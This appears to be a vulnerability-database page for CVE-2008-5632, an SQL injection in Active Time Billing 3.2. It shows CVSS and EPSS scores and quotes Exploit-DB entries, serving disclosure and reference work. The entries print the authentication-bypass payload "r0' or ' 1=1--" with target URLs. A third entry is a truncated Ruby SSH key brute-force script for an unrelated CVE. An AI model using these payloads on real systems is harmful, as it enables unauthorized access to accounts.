CVE-2008-5632
Published 2008-12-17
Priority P342, high, CVSS 2.0 score 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.02% (59.1th percentile)
SQL injection vulnerability in Account.asp in Active Time Billing 3.2 allows remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters, possibly related to start.asp. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| activewebsoftwares | active_time_billing | — | — |
No detection rules found.
Exploit-DB
Active Time Billing 3.2 - Authentication Bypass
exploitdb·2008-11-30
CVE-2008-5632 Active Time Billing 3.2 - Authentication Bypass
---
###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################
#found by : OffensiveTrack
#Author : AlpHaNiX
#website : www.offensivetrack.org
#contact on mail & msn : [email protected]
###########################################################################
#script : Active timebilling
#€xploit : http://www.activewebsoftwares.com/demoactivetimebilling/Account.asp
username: r0' or ' 1=1--
password: r0' or ' 1=1--
#greetz : My Best Friend Zigma
###########################################################################
# milw0rm.com [2008-11-30]
Exploit-DB
Active Force Matrix 2 - Authentication Bypass
exploitdb·2008-11-29
CVE-2008-5634 Active Force Matrix 2 - Authentication Bypass
---
[~] ----------------------------In the name of God, the Most Gracious, the Most Merciful------------------------------
[~]Type:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Force Matrix v 2
[~]author: ((Ñ3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactiveforcematrix/account.asp
[~]--------------------------------------------------------------------------------
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري
[~]
[~] special thank
Exploit-DB
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)
exploitdb·2008-05-16
CVE-2008-0166 OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)
OpenSSL 0.9.8c-1
#
# This tool helps to find user accounts with weak SSH keys
# that should be regenerated with an unaffected version
# of openssl.
#
# You will need the precalculated keys provided by HD Moore
# See http://metasploit.com/users/hdm/tools/debian-openssl/
# for further information.
#
# Common Keys:
#
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
#
# Usage:
# debian_openssh_key_test.rb
#
# E-DB Note: See here for an update ~ https://github.com/offensive-security/exploitdb/pull/76/files
#
require 'thread'
THREADCOUNT = 10
KEYSPERCONNECT = 3
queue = Queue.new
thre
No writeups or analysis indexed.
Published: 2008-12-17